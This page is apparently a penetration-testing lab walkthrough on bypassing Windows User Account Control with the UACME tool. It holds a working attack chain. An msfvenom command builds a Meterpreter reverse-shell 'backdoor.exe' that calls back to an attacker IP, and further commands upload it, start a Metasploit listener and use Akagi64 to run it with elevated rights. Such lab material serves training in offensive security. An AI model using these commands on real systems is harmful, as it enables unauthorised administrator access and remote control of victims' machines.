Bypassing UAC using the UACME tool

GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub

UACME:

Defeat Windows User Account Control (UAC) and get Administrator privileges.
It abuses the built-in Windows AutoElevate executables.
It has 65+ methods that can be used by the user to bypass UAC depending on the Windows OS version.
Developed by https://twitter.com/hFireF0X
Written majorly in C, with some code in C++

Get a windows shell and check if the admin user is a member of the Administrators group.

shell
net localgroup administrators

The admin user is a member of the Administrators group. However, we do not have the high privilege as of now. We can gain high privilege by Bypassing UAC (User Account Control)

We are going to bypass the UAC for admin user with the help of UACMe tool.

Generating malicious executable using msfvenom and running it on the target machine to gain administrator user privileges.

Note: Please make sure that you replace the “10.10.31.2” local IP address with yours.

Generating malicious executable using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.44.2 LPORT=4444 -f exe > 'backdoor.exe'

Switch the directory to the user’s temp folder and upload the Akagi64.exe and backdoor.exe executable.

cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls

Start another msfconsole and run a multi handler.

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.44.2
set LPORT 4444
exploit

Switch back to the meterpreter and run the Akagi64.exe executable.

Note: Please provide the full path of the backdoor executable.

shell
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe

Once we execute the above command we would expect a meterpreter session.

We have successfully gained high privilege access.

PreviousPrint Spooler NextUAC Bypass: Memory Injection (Metasploit)

Last updated 29 days ago